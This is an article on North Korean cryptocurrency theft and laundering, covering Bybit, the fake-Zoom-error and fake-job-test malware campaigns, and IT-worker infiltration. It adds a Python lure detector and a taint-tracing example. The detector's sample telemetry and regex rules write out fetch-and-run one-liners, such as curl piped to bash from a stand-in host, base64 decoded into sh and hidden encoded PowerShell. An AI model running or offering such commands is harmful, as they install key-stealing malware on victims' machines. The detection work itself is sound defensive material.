The largest confirmed crypto theft in history occurred on February 21, 2025, when North Korean (DPRK) hackers stole about $1.46 billion worth of cryptoassets from the Dubai-based exchange Bybit. Elliptic first attributed the attack to DPRK actors, and the FBI subsequently confirmed that attribution. The group's laundering of the proceeds used several novel techniques, among them refund addresses, worthless tokens, and spreading funds across multiple mixing services.
By August 2025, more than $1 billion of the proceeds had been laundered, largely through Chinese over-the-counter (OTC) brokers. Although most of the funds have now been processed, the Bybit hack marked an escalation of DPRK cryptocurrency theft rather than its end. In 2025, DPRK hackers stole a record $2 billion worth of cryptoassets, bringing their cumulative total to over $6 billion.
According to analysts, these funds support North Korea's missile and nuclear programs. In January 2026, Elliptic recorded twice as many exploits as in January 2025, indicating that activity is still increasing. Technical exploits follow, but the initial access vector in these incidents is social engineering.
To get around language barriers and improve the deception, operators build plausible personas and pretexts, probably with the help of AI.

[Figure: illustration of a fake Zoom error screen as a victim would see it (Source: Elliptic)]

DangerousPassword, Contagious Interview, and IT Infiltration Techniques

Since January 1, 2026, two ongoing campaigns, Contagious Interview and DangerousPassword, have generated $37.5 million. DangerousPassword contacts victims from compromised social media accounts, often citing shared history such as a previous meeting.
When victims join a video call on Zoom or Microsoft Teams, a fake audio-error message prompts them to run command-line code, and that code installs malware. The malware then hunts for passwords, private keys, and seed phrases to enable further account takeovers. Contagious Interview instead uses fake job offers: candidates are asked to complete a "technical test" that requires running code from malware-laced repositories hosted on trusted platforms.
Running the test deploys similar key-stealing tools.

[Figure: illustration of a Contagious Interview message (Source: Elliptic)]

If the victim is using an employer-issued device, either campaign can compromise the organization as well. Separately, DPRK IT workers patiently infiltrate crypto projects using fictitious identities, cloned accounts, and rented laptops for location spoofing, and they refer accomplices for further roles.
Salaries provide direct income, but in remote-first environments the real objective is often persistent access, backdoors, or compromised developer machines.
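The "run this command to fix your audio" lure described above leaves a recognisable trace in endpoint telemetry: a human-typed shell one-liner that downloads or decodes something and pipes it straight into an interpreter. The following detector is an added example written for this page, not tooling from Elliptic or from the report; the regex rules, the list of interactive parent processes, and every event in the sample telemetry are this example's own constructed assumptions about what such lures look like.

```python
import re

# Heuristic rules for paste-this-command lures. Each maps a rule name to a
# regex over the full command line. These patterns are assumptions made for
# this example, not indicators taken from the report.
RULES = {
    # curl/wget output piped straight into an interpreter
    "download_and_execute": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|dash|python[23]?)\b", re.I),
    # base64 blob decoded and piped into an interpreter (obfuscated variant)
    "decode_and_execute": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|python[23]?)\b", re.I),
    # Windows variant: PowerShell launched with an encoded command
    "encoded_powershell": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    # Windows variant: fetch a remote script and Invoke-Expression it
    "remote_powershell": re.compile(
        r"(?:\bIEX\b|Invoke-Expression).*(?:DownloadString|Invoke-WebRequest|\biwr\b)"
        r"|(?:DownloadString|Invoke-WebRequest|\biwr\b).*(?:\bIEX\b|Invoke-Expression)", re.I),
}

# Interactive consoles: a match whose parent is one of these was most likely
# typed or pasted by a person, which is exactly how the lure is delivered.
# (Assumed list; extend it for the terminals in your fleet.)
INTERACTIVE_PARENTS = {"terminal", "iterm2", "gnome-terminal", "konsole",
                       "cmd.exe", "powershell.exe", "windowsterminal.exe"}


def classify_command(cmd):
    """Return the names of every rule the command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan_events(events):
    """Flag process-launch events whose command line matches a lure pattern.

    Each event is a dict with keys user, parent and cmd. Returns one alert
    per matching event, noting whether the parent was an interactive console.
    """
    alerts = []
    for ev in events:
        hits = classify_command(ev["cmd"])
        if hits:
            alerts.append({
                "user": ev["user"],
                "parent": ev["parent"],
                "rules": hits,
                "interactive": ev["parent"].lower() in INTERACTIVE_PARENTS,
            })
    return alerts


# Constructed sample telemetry for the demo; none of this is real data.
SAMPLE_EVENTS = [
    {"user": "alice", "parent": "Terminal",
     "cmd": "curl -fsSL https://fix-audio.invalid/zoom-audio.sh | bash"},
    {"user": "alice", "parent": "Terminal",
     "cmd": "echo aGVsbG8gd29ybGQK | base64 -d | sh"},
    {"user": "bob", "parent": "Terminal",
     "cmd": "git pull origin main"},
    {"user": "carol", "parent": "cmd.exe",
     "cmd": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"user": "dave", "parent": "Terminal",
     "cmd": "curl -O https://files.invalid/release.tar.gz"},   # download only: not flagged
    {"user": "erin", "parent": "cron",
     "cmd": "bash -c 'curl -s https://updates.invalid/u.sh | sh'"},  # flagged, but not interactive
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

The `interactive` flag is the triage key: a download-and-execute one-liner from cron is worth a look, but the same pattern typed into Terminal by a user who had a Zoom or Teams call open minutes earlier is the lure itself, and the host should be treated as compromised with its seed phrases and keys assumed stolen.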
The Tenexium incident illustrates this evolution. Tenexium.io, a self-described decentralized margin trading protocol in the Bittensor (TAO) ecosystem, went offline on January 1, 2026, after $2.5 million in liquidity was drained from its treasury. The project, registered in September 2025, showed no activity after December 31.
Reports identified DPRK-affiliated contributors, and blockchain analysis showed laundering patterns, such as cross-chain overlaps and centralized cashouts, that match known DPRK exploits. Although it has not been conclusively established that Tenexium was a DPRK front from the outset, the evidence suggests operatives may now build fake projects to embezzle funds, moving from infiltration to creation. This ongoing campaign demands vigilance: DPRK tactics are evolving, combining insider threats, malware, and phishing with AI-enhanced techniques.
Incident                                 | Date                  | Amount Stolen | Key Tactic                                   | Source
Bybit hack                               | February 2025         | $1.46 billion | Social engineering + exploit                 | FBI, Elliptic
2025 total                               | January–December 2025 | $2 billion    | Mixed (social engineering, IT infiltration)  | Elliptic
Tenexium                                 | January 1, 2026       | $2.5 million  | Possible fake project                        | X report
DangerousPassword + Contagious Interview | January 2026          | $37.5 million | Social engineering                           | Elliptic research

Crypto companies need to vet remote hires thoroughly, watch for social engineering red flags such as unsolicited calls or repository-based "tests", and use blockchain analytics spanning more than 60 chains to trace tainted funds. Elliptic's tools, such as Investigator for visualizing laundering flows, help firms block assets connected to the DPRK.
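Tracing tainted funds across chains comes down to one bookkeeping rule applied in transaction order: each outgoing transfer carries the sender's current tainted fraction, and a deposit to a bridge is credited to the bridge's payout address on the other chain so the hop is not lost. The code below is an added example written for this page, not Elliptic's or any vendor's method; the pro-rata taint rule, the bridge mapping, and every address and amount in the ledger are constructed for the demo.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Wallet:
    balance: float = 0.0   # total value currently held
    tainted: float = 0.0   # portion of that value traced back to the theft

    @property
    def fraction(self):
        return self.tainted / self.balance if self.balance > 0 else 0.0


def trace_taint(ledger, stolen_from, bridges):
    """Propagate taint pro rata through a ledger of transfers.

    ledger:      iterable of (ts, chain, sender, receiver, amount), any order.
    stolen_from: addresses whose outflows in the ledger are the theft itself,
                 so every unit leaving them counts as tainted.
    bridges:     {deposit_addr: payout_addr}; value reaching a bridge deposit
                 address on one chain is credited to its payout address on
                 the other chain, which is how the cross-chain hop is followed.
    Returns {address: Wallet} for every tracked address.
    """
    wallets = defaultdict(Wallet)
    for ts, chain, src, dst, amt in sorted(ledger):
        if src in stolen_from:
            moved_taint = amt
        else:
            w = wallets[src]
            if w.balance < amt:            # unseen prior funds: assume untainted
                w.balance = amt
            moved_taint = amt * w.fraction  # pro-rata (proportional) taint rule
            w.balance -= amt
            w.tainted -= moved_taint
        dst = bridges.get(dst, dst)         # follow the bridge to the far side
        wallets[dst].balance += amt
        wallets[dst].tainted += moved_taint
    return dict(wallets)


def cashout_exposure(wallets, cashout_addrs):
    """Tainted value sitting at each known centralized cashout point."""
    return {a: wallets[a].tainted for a in cashout_addrs if a in wallets}


# Constructed ledger: (timestamp, chain, sender, receiver, amount).
# Addresses and amounts are invented; "bridge_in"/"bridge_out" stand for the
# two sides of one cross-chain bridge.
LEDGER = [
    (1, "eth", "victim_hot_wallet", "attacker_A", 1000.0),   # the theft
    (2, "eth", "clean_source", "attacker_A", 1000.0),        # attacker co-mingles clean funds
    (3, "eth", "attacker_A", "bridge_in", 1000.0),           # half of this is tainted
    (4, "btc", "bridge_out", "otc_broker", 1000.0),          # same value, other chain
    (5, "eth", "attacker_A", "exchange_deposit", 500.0),
    (6, "btc", "otc_broker", "cashout_exchange", 600.0),
]
STOLEN_FROM = {"victim_hot_wallet"}
BRIDGES = {"bridge_in": "bridge_out"}
CASHOUTS = ["exchange_deposit", "cashout_exchange"]

if __name__ == "__main__":
    wallets = trace_taint(LEDGER, STOLEN_FROM, BRIDGES)
    for addr, w in sorted(wallets.items()):
        print(f"{addr:18s} balance={w.balance:8.1f} tainted={w.tainted:7.1f} ({w.fraction:.0%})")
    print("at cashout points:", cashout_exposure(wallets, CASHOUTS))
```

Because the attacker mixed 1,000 clean units into the same wallet before moving funds, every downstream hop in this ledger carries a 50% tainted fraction, and the 1,000 stolen units remain exactly accounted for across the attacker's residual balance, the exchange deposit, the OTC broker and the final cashout. Real investigations layer on heuristics the page alludes to (cluster attribution for OTC desks, timing overlaps between bridge deposits and withdrawals) but the proportional rule above is the core of the taint arithmetic.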